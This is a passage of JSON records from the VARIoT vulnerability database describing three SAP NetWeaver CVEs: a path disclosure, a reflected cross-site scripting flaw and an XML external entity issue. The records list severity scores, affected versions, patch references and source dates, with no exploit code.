"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-1961",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-204",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. 4. SAP NetWeaver is prone to multiple security vulnerabilities, including:\n1. An information-disclosure vulnerability\n2. Multiple cross-site scripting vulnerabilities\n3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1961",
"trust": 3.2
},
{
"db": "SECUNIA",
"id": "56947",
"trust": 1.6
},
{
"db": "BID",
"id": "65547",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411",
"trust": 0.8
},
{
"db": "IVD",
"id": "5150A9F4-1EEB-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"id": "VAR-201402-0237",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
]
},
"last_update_date": "2023-12-18T13:39:58.004000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1852146",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver has multiple vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43676"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1961"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/56947"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1852146"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1961"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1961"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"date": "2014-02-14T15:55:07.470000",
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"date": "2018-12-10T19:29:03.467000",
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Portal WebDynPro Vulnerabilities in which important path information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
}
}
var-202303-1219
Vulnerability from variot
Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application. SAP of SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202303-1219",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "701"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "740"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "702"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "750"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "731"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "700"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-0021"
}
]
},
"cve": "CVE-2023-0021",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2023-0021",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-0021",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-0021",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202303-976",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to insufficient encoding of user input, SAP NetWeaver - versions 700, 701, 702, 731, 740, 750, allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password, which could lead to reflected Cross-Site scripting. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application. SAP of SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-0021",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-005228",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202303-976",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"id": "VAR-202303-1219",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:21:52.789000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=229500"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/3274920"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0021"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-0021/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"date": "2023-03-14T05:15:28.367000",
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"date": "2023-03-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-07T05:04:00",
"db": "JVNDB",
"id": "JVNDB-2023-005228"
},
{
"date": "2023-11-07T03:59:27.557000",
"db": "NVD",
"id": "CVE-2023-0021"
},
{
"date": "2023-03-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-005228"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202303-976"
}
],
"trust": 0.6
}
}
var-201812-0571
Vulnerability from variot
SAML 2.0 functionality in SAP NetWeaver AS Java, does not sufficiently validate XML documents received from an untrusted source. This is fixed in versions 7.2, 7.30, 7.31, 7.40 and 7.50. SAP NetWeaver AS Java Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. SAP NetWeaver AS Java is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-0571",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
}
],
"sources": [
{
"db": "BID",
"id": "106153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2492"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "106153"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2492",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2492",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
